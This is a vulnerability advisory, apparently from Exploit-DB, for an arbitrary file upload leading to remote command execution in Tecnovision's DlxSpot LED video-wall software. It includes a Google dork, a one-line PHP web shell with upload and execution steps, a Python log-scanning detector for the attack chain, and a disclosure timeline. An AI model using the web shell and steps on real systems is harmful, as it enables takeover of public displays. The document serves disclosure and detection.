Tecnovision DLX Spot – Arbitrary File Upload

  • Author: Simon Brannstrom
    Date: 2017-05-19
  • Category:
    Platform:
  • Source: https://www.exploit-db.com/exploits/42755/
# Exploit Title: DlxSpot - Player4 LED video wall - Arbitrary File Upload to RCE
# Google Dork: "DlxSpot - Player4"
# Date: 2017-05-14
# Discoverer: Simon Brannstrom
# Authors Website: https://unknownpwn.github.io/
# Vendor Homepage: http://www.tecnovision.com/
# Software Link: n/a
# Version: >1.5.10
# Tested on: Linux
# About: DlxSpot is the software controlling Tecnovision LED Video Walls all over the world; they are used in football arenas, concert halls, shopping malls, as road signs etc.
# CVE: CVE-2017-12929
# Linked CVEs: CVE-2017-12928, CVE-2017-12930.

# Visit my github page at https://github.com/unknownpwn/unknownpwn.github.io/blob/master/README.md for complete takeover of the box, from SQLi to root access.
###############################################################################################################################

Arbitrary File Upload leading to Remote Command Execution:

1. Visit http://host/resource.php and upload a PHP shell. For example: <?php system($_GET["c"]); ?>
2. RCE via http://host/resource/source/shell.php?c=id
3. Output: www-data
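
As an added detection example (not part of the advisory or the vendor's software), the following Python flags the upload-then-execute chain described above in web-server access logs: a POST to the upload form followed by a request for a .php script under the upload directory. The combined log format, the two paths and the sample log lines are assumptions constructed for the example.

```python
import re
from collections import defaultdict

# Apache/nginx "combined" access-log format (assumed; adapt the regex to your format).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

UPLOAD_ENDPOINT = "/resource.php"   # upload form named in the advisory
UPLOAD_DIR = "/resource/source/"    # directory the uploaded files are served from

def parse(line):
    """Return the fields of one log line, or None if it does not match the format."""
    m = LOG_RE.match(line)
    return m.groupdict() if m else None

def find_upload_rce(lines):
    """Alert on every request that executes a .php script under UPLOAD_DIR.
    Uploaded files should never be served as code, so any such hit is suspicious;
    'after_upload' marks clients that POSTed to the upload endpoint earlier in
    the same log, i.e. the full chain from the advisory."""
    posted = defaultdict(bool)
    alerts = []
    for line in lines:
        r = parse(line)
        if r is None:
            continue
        path = r["path"].split("?", 1)[0]       # strip the query string
        if r["method"] == "POST" and path == UPLOAD_ENDPOINT:
            posted[r["ip"]] = True
        if path.startswith(UPLOAD_DIR) and path.lower().endswith(".php"):
            alerts.append({"ip": r["ip"], "ts": r["ts"], "request": r["path"],
                           "status": r["status"], "after_upload": posted[r["ip"]]})
    return alerts

# Constructed sample log (not real traffic) reproducing the advisory's steps.
SAMPLE_LOG = [
    '203.0.113.5 - - [19/May/2017:10:00:01 +0000] "GET /resource.php HTTP/1.1" 200 1523 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [19/May/2017:10:00:07 +0000] "POST /resource.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
    '203.0.113.5 - - [19/May/2017:10:00:12 +0000] "GET /resource/source/shell.php?c=id HTTP/1.1" 200 64 "-" "Mozilla/5.0"',
    '198.51.100.9 - - [19/May/2017:10:01:00 +0000] "GET /resource/source/logo.png HTTP/1.1" 200 9000 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for alert in find_upload_rce(SAMPLE_LOG):
        print(alert)
```

The same rule expressed as a web-server configuration (deny script execution under the upload directory) is the corresponding mitigation.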
    
TIMELINE:
2017-05-14 - Discovery of vulnerabilities.
2017-05-15 - Contacted Tecnovision through contact form on manufacturer homepage.
2017-06-01 - No response, tried contacting again through several contact forms on homepage.
2017-08-10 - Contacted Common Vulnerabilities and Exposures (CVE) requesting CVE assignment.
2017-08-17 - Three CVEs assigned for the vulnerabilities found.
2017-08-22 - With help from fellow hacker and friend, byt3bl33d3r, sent an email in Italian to the company.
2017-09-18 - No response, full public disclosure.
    
DEDICATED TO MARCUS ASTROM
FOREVER LOVED - NEVER FORGOTTEN